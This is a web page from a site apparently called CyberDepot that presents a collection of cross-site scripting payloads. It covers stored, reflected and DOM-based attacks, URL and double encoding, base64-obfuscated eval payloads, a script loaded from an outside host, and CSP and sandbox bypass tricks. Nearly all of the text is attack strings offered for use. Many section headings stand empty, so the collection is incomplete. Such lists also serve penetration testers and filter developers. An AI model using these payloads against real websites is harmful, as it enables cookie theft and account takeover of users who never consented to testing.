XSS Payload Collection
Overview
Cross-Site Scripting (XSS) is a type of security vulnerability typically found in web applications. It allows attackers to inject malicious scripts into web pages viewed by other users. There are three main types of XSS attacks: Stored XSS, Reflected XSS, and DOM-based XSS. This page provides a comprehensive collection of XSS payloads for each type, including advanced and encrypted payloads for bypassing filters.
Stored XSS Payloads
Basic Payloads
<script>alert('XSS');</script>
<script>alert(document.cookie);</script>
<img src=x onerror=alert('XSS')>
Advanced Payloads
<svg/onload=alert('XSS')>
<body onload=alert('XSS')>
<iframe src="javascript:alert('XSS');"></iframe>
Event Handlers
<div onmouseover="alert('XSS')">Hover over me!</div>
<input type="text" value="XSS" onfocus="alert('XSS')">
<a href="#" onclick="alert('XSS')">Click me</a>
Attribute Injection
<math><mtext><malignmark><mi><audio autoplay onloadstart=alert('XSS')></audio>
<xss style="xss:expression(alert('XSS'))">
<marquee width=1 loop=1 scrollamount=1 onfinish=confirm(1)>
Filter Bypass Payloads
Using Backticks
Using Data URIs
Double Encoding
Encrypted Payloads
Base64 Encoding with Execution
Hex Encoding with Execution
Reflected XSS Payloads
Basic Payloads
URL Encoded Payloads
%3Cscript%3Ealert('XSS')%3C/script%3E
%3Cimg%20src%3Dx%20onerror%3Dalert('XSS')%3E
%3Csvg%2Fonload%3Dalert('XSS')%3E
Event Handlers
"><div onmouseover="alert('XSS')">Hover over me!</div>
"><input type="text" value="XSS" onfocus="alert('XSS')">
"><a href="#" onclick="alert('XSS')">Click me</a>
DOM-based XSS Payloads
Basic Payloads
document.write('<script>alert("XSS")</script>');
document.body.innerHTML = '<img src=x onerror=alert("XSS")>';
location.hash = '"><script>alert("XSS")</script>';
Advanced Payloads
location="javascript:alert('XSS')";
window.location = 'javascript:alert("XSS")';
document.location = 'javascript:alert("XSS")';
Event Handlers
var x = document.createElement("div");
x.onmouseover = function() { alert('XSS'); };
document.body.appendChild(x);
document.getElementById('test').setAttribute('onmouseover', 'alert("XSS")');
element.attachEvent('onclick', function(){ alert('XSS'); });
Advanced XSS Payloads
Polyglot Payloads
<script src=//your.site/0></script>
"><script src=//your.site/0 onerror=eval(atob('ZG9jdW1lbnQud3JpdGUoJzxzY3JpcHQ+YWxlcnQoJ1hTUycpOzwvc2NyaXB0Pic='))></script>
Filter Bypass Techniques
<IMG SRC=`javascript:alert("XSS")`>
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">Click here</a>
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
Payloads for Specific Contexts
JSON Context
XML Context
SVG Context
Exploiting CSP Bypasses
Exploiting CSP with JSONP
Exploiting CSP with DOM Clobbering
Bypassing Input Sanitization
Null Byte Injection
Breaking Out of Tags
Chained Injection
Sandbox Escapes
Bypassing Sandbox with PostMessage
<iframe sandbox="allow-scripts" srcdoc="<script>window.parent.postMessage('XSS','*')</script>"></iframe>
Exploiting Trusted Domains
<iframe src="https://trusted-domain.com" onload="this.contentWindow.postMessage('<script>alert(1)</script>', '*')"></iframe>
Using Mutation Observers
var observer = new MutationObserver(function(mutations) {
mutations.forEach(function(mutation) {
if (mutation.addedNodes.length) {
var script = document.createElement('script');
script.innerHTML = 'alert("XSS")';
document.body.appendChild(script);
}
});
});
observer.observe(document, { childList: true, subtree: true });
document.body.appendChild(document.createElement('div'));
Bypassing HTML Sanitizers
Using Angle Brackets
Exploiting Weak Sanitizers
This XSS Payload Collection is part of CyberDepot, maintained by #AfterDark.